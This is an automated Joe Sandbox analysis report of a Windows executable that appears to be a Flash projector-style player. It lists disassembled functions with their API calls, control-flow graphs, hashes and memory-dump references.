                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 542301482-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                                                                                                                                                                        • Instruction ID: d33697237a28c181885f9fc6147cb760b8f27fbda8fa23562785bbd0682874fe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8F0823270111167D7288A2EEC45BE7B7D9AFD8710B05412ABD04D7280D7A0EC418594
                                                                                                                                                                                                                                                                                                        Function 004CB0E0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                                                                                                                                                                        • Instruction ID: 055774edfa36a1cc0f2afeca4167b9a8919af704cd7fbd49c209ae17ea6089f8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3E0C22C0042804EE7608F38A90AB593BB1AB65244F8804DCD4E443213D3B9021FE766
                                                                                                                                                                                                                                                                                                        Function 004F4A60 Relevance: 43.9, APIs: 22, Strings: 7, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 26 4f4a60-4f4a93 EnterCriticalSection 27 4f4a95-4f4a9d 26->27 28 4f4aa3-4f4aab 26->28 27->28 29 4f4aad-4f4ab5 28->29 30 4f4abb-4f4ac3 28->30 29->30 31 4f4ac5-4f4acd 30->31 32 4f4ad3-4f4adb 30->32 31->32 33 4f4aed-4f4af5 32->33 34 4f4add-4f4ae7 32->34 35 4f4afb-4f4b07 LeaveCriticalSection 33->35 36 4f4bf2-4f4bfe LeaveCriticalSection 33->36 34->33 37 4f4b09-4f4b19 35->37 38 4f4b21-4f4b27 35->38 39 4f4c18-4f4c1e 36->39 40 4f4c00-4f4c10 36->40 37->38 41 4f4b29-4f4b39 38->41 42 4f4b41-4f4b47 38->42 43 4f4c38-4f4c3e 39->43 44 4f4c20-4f4c30 39->44 40->39 41->42 45 4f4bbb-4f4bc1 42->45 46 4f4b49-4f4b69 42->46 47 4f4cb2-4f4cb8 43->47 48 4f4c40-4f4c60 43->48 44->43 51 4f4f2f-4f4f35 45->51 52 4f4bc7-4f4bf1 45->52 53 4f4b6b 46->53 54 4f4b71-4f4bb8 call 462e80 call 4a5380 call 439d00 46->54 55 4f4cdc-4f4d05 EnterCriticalSection LeaveCriticalSection 47->55 56 4f4cba-4f4cd4 47->56 49 4f4c68-4f4caf call 462e80 call 4a5380 call 439d00 48->49 50 4f4c62 48->50 49->47 50->49 53->54 54->45 59 4f4f2e 55->59 60 4f4d0b-4f4d1c EnterCriticalSection LeaveCriticalSection 55->60 56->55 59->51 64 4f4d24-4f4d42 EnterCriticalSection 60->64 65 4f4df8-4f4e1d EnterCriticalSection call 4f3bc0 LeaveCriticalSection 64->65 66 4f4d48-4f4d50 64->66 77 4f4e1f-4f4e2b 65->77 78 4f4e3b-4f4e46 call 4f3340 65->78 66->65 69 4f4d56-4f4d6e EnterCriticalSection LeaveCriticalSection 66->69 73 4f4d74-4f4df1 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 69->73 74 4f4df3 69->74 73->65 73->74 74->65 81 4f4e2d 77->81 82 4f4e32-4f4e34 77->82 89 4f4e97-4f4e9c LeaveCriticalSection 78->89 90 4f4e48-4f4e4d 78->90 81->82 82->78 87 4f4e36-4f4e39 82->87 87->78 87->89 91 4f4ea2-4f4ebd EnterCriticalSection 89->91 92 4f4e4f-4f4e51 90->92 93 4f4e69-4f4e73 call 4f3d00 90->93 96 4f4ebf-4f4ec1 91->96 97 4f4ed8-4f4ee5 LeaveCriticalSection 91->97 92->93 94 4f4e53-4f4e55 92->94 101 4f4e78-4f4e8f LeaveCriticalSection 93->101 94->93 100 4f4e57-4f4e67 call 4ff020 call 439d00 94->100 102 4f4eca-4f4ed2 96->102 103 4f4ec3-4f4ec8 96->103 98 4f4f0c-4f4f12 97->98 99 4f4ee7-4f4efb EnterCriticalSection 97->99 98->59 107 4f4f14-4f4f29 98->107 104 4f4efd 99->104 105 4f4f01-4f4f06 LeaveCriticalSection 99->105 100->101 101->64 108 4f4e95 101->108 102->97 103->97 104->105 105->98 107->59 108->91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-761530088
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65
                                                                                                                                                                                                                                                                                                        Function 004D5D20 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 284COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 590 4d5d20-4d5d40 call 435350 593 4d6069-4d6073 590->593 594 4d5d46-4d5d56 call 435400 590->594 597 4d5d58-4d5d6f DestroyWindow 594->597 598 4d5d72-4d5d82 call 435400 594->598 601 4d5dab-4d5dbb call 435400 598->601 602 4d5d84-4d5da8 call 4d5380 call 4db4e0 598->602 607 4d5dbd-4d5dec call 4d5380 call 4a7ac0 601->607 608 4d5def-4d5dff call 435400 601->608 616 4d5fdc-4d5fec call 435400 608->616 617 4d5e05-4d5e12 608->617 630 4d5fee-4d602f call 4d5380 GetMenu call 4dad30 616->630 631 4d6032-4d6042 call 435400 616->631 620 4d5e14-4d5e16 617->620 621 4d5e41-4d5e55 GetModuleFileNameA 617->621 625 4d5e1c-4d5e1e 620->625 626 4d5e18-4d5e1a 620->626 622 4d605c-4d6066 621->622 623 4d5e5b-4d5e5c 621->623 623->622 629 4d5e62-4d5e69 623->629 627 4d5e24-4d5e26 625->627 628 4d5e20-4d5e22 625->628 626->625 632 4d5e38-4d5e3f 626->632 634 4d5e2c-4d5e2e 627->634 635 4d5e28-4d5e2a 627->635 628->627 628->632 636 4d5e6b-4d5e6e 629->636 637 4d5e80-4d5e82 629->637 631->593 644 4d6044-4d6056 call 4d5380 631->644 632->620 632->621 634->632 640 4d5e30-4d5e32 634->640 635->632 635->634 636->637 641 4d5e70-4d5e71 636->641 637->622 643 4d5e88-4d5e92 637->643 640->622 640->632 641->629 645 4d5e73-4d5e7d 641->645 647 4d5e95-4d5e9a 643->647 644->622 647->647 650 4d5e9c-4d5ec2 call 52b380 * 2 647->650 656 4d5fbf-4d5fd9 call 439d00 * 2 650->656 657 4d5ec8-4d5eca 650->657 657->656 659 4d5ed0-4d5eda 657->659 661 4d5ee0-4d5ee8 659->661 661->661 663 4d5eea-4d5eed 661->663 665 4d5ef0-4d5ef6 663->665 665->665 666 4d5ef8-4d5f20 665->666 667 4d5f22-4d5f2a 666->667 667->667 668 4d5f2c-4d5f30 667->668 669 4d5f33-4d5f39 668->669 669->669 670 4d5f3b-4d5f4d 669->670 671 4d5f50-4d5f55 670->671 671->671 672 4d5f57-4d5f5d 671->672 673 4d5f60-4d5f66 672->673 673->673 674 4d5f68-4d5fb9 CreateProcessA 673->674 674->656
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                        • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                                                                                                                                                                        • API String ID: 3375834691-1928458085
                                                                                                                                                                                                                                                                                                        • Opcode ID: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9
                                                                                                                                                                                                                                                                                                        Function 004DB4E0 Relevance: 22.7, APIs: 15, Instructions: 180windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                                                                                                                                                                        • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3087884050-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                        • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65
                                                                                                                                                                                                                                                                                                        Function 004CFE40 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 164registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 730 4cfe40-4cfe62 731 4cfe68-4cfe6d call 497d20 730->731 732 4cffe0-4cfffd RegOpenKeyExA 730->732 741 4cfe6f call 4cb0e0 731->741 734 4cffff-4d002b RegQueryValueExA 732->734 735 4d0049-4d0059 732->735 736 4d002d-4d0039 call 435020 734->736 737 4d003e-4d0042 734->737 736->737 740 4d0043 RegCloseKey 737->740 740->735 742 4cfe74-4cfe76 741->742 743 4cfe7c-4cfe99 RegOpenKeyExW 742->743 744 4cff3f-4cff5c RegOpenKeyExA 742->744 743->735 746 4cfe9f-4cfecb RegQueryValueExW 743->746 744->735 745 4cff62-4cff8e RegQueryValueExA 744->745 747 4cffd9-4cffde 745->747 748 4cff90-4cff93 745->748 746->737 749 4cfed1-4cfee3 call 4b8350 746->749 747->740 750 4cffc8-4cffd4 call 435020 748->750 751 4cff95-4cffa9 call 4b8440 748->751 749->737 756 4cfee9-4cfeec 749->756 750->747 751->747 760 4cffab-4cffc6 call 435020 call 439d00 751->760 758 4cfeee-4cff04 call 435020 call 439d00 756->758 759 4cff09-4cff1e call 4d9d70 call 439d00 756->759 758->737 759->737 773 4cff24-4cff3a call 435020 call 439d00 759->773 760->740 773->737
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFE8F
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFEC1
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFF52
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFF84
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFFF3
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004D0021
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004D0043
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
